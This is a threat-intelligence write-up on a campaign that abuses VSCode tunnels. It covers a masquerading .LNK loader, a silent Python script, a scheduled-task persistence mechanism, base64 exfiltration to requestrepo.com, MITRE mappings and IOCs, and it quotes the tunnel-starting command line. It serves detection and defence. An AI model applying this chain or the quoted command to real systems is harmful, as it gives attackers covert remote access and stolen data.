Keypoints
- Initial vector: a disguised .LNK file (masquerading as an installer) that downloads and extracts a Python embed package.
- The shortcut saves and executes a malicious script (update.py) using pythonw.exe to run silently.
- The script checks for/installs the VSCode CLI (code.exe) into %LOCALAPPDATA% and uses the VSCode tunnel feature to create a remote session tied to a GitHub activation code.
- Persistence is established via a scheduled task named MicrosoftHealthcareMonitorNode; behavior differs by privilege (4-hour trigger for non-admin, SYSTEM logon trigger for admin with high priority).
- Data collection includes folder listings, running processes, system locale/location, and user/domain info; data is base64-encoded and POSTed to requestrepo.com.
- Attack flow and tooling mirror techniques previously observed from the Stately Taurus group, enabling full remote file and terminal access for follow-on activity.
MITRE Techniques
- [T1059.006] Command and Scripting Interpreter: Python – The attacker downloads and executes a Python script to perform installation and orchestration (‘Update.py is downloaded and executed by the shortcut file.’)
- [T1053.005] Scheduled Task/Job: Scheduled Task – The malware creates a scheduled task “MicrosoftHealthcareMonitorNode” to run update.py on a regular schedule or at logon (‘”MicrosoftHealthcareMonitorNode” scheduled task is created’).
- [T1036.005] Masquerading: Match Legitimate Name or Location – The campaign places files under %localappdata%/Microsoft/Python to resemble legitimate application folders (‘Creates a folder “%localappdata%/Microsoft/Python” directory’).
- [T1082] System Information Discovery – The script collects system language, geo-location, computername, username, and userdomain for environment profiling (‘Collects system’s language settings, geographical location, computername, username, and userdomain’).
- [T1420] File and Directory Discovery – The actor gathers folder names from Program Files/ProgramData/Users to map the filesystem (‘Collects folder names present in program files and program data directory’).
- [T1057] Process Discovery – The malware runs tasklist to enumerate running processes and detect code.exe instances (‘”tasklist” command is used to gather a list of currently running processes.’)
- [T1071.001] Application Layer Protocol: Web Protocols – VSCode tunnel and HTTP POST are used for command-and-control and data transfer (‘The VSCode tunnel feature is used to access the victim’s system.’)
Indicators of Compromise
- [SHA-256] Shortcut and script hashes – 281766109f2375a01bad80478fd18841eccaefc1ee9277179cc7ff075d1beae2 (shortcut), c7f07bdfb91653f53782885a3685436e2e965e1c5f4863c03f5a9825c0364489 (update.py)
- [URL] Malicious download locations – hxxps://paste[.]ee/r/DQjrd/0 (source of update.py)
- [C2 URL] Exfiltration endpoint – hxxp://requestrepo.com/r/2yxp98b3 (POST target used to receive stolen data)
- [Filenames/Paths] Deployed artifacts and directories – update.py, python-3.12.5-embed-amd64.zip, and installation path examples like %LOCALAPPDATA%MicrosoftPython and %LOCALAPPDATA%microsoftVScode
The operation starts when a user executes a malicious .LNK masquerading as an installer; the shortcut displays a fake success message while using curl to download an embedded Python ZIP (python-3.12.5-embed-amd64.zip). The ZIP is extracted into %LOCALAPPDATA% (e.g., %LOCALAPPDATA%MicrosoftPython), then update.py is fetched from a paste.ee URL and launched with pythonw.exe to run without a visible console.
Update.py verifies or deploys the VSCode CLI (code.exe) into %LOCALAPPDATA%microsoftVScode, creates or updates a scheduled task named MicrosoftHealthcareMonitorNode for persistence (four-hour recurring run for non-admins; SYSTEM-level logon trigger with high priority when admin privileges exist), and manages VSCode tunnels. The script logs out existing tunnels, starts a new tunnel with the command “code.exe –locale en-US tunnel –accept-server-license-terms –name “, captures the output to files (output.txt/output2.txt), and extracts the 8-character GitHub device activation code via regex for later use.
The malware collects system details (locale, geo-info, computer name, username, userdomain), enumerates directories (Program Files, ProgramData, Users) and processes (via tasklist), encodes the results in base64, and sends them to the actor’s endpoint at requestrepo.com through an HTTP POST. The adversary then redeems the captured activation code at GitHub’s device login to activate the VSCode tunnel and obtain interactive file and terminal access for follow-on actions such as credential harvesting and tool execution.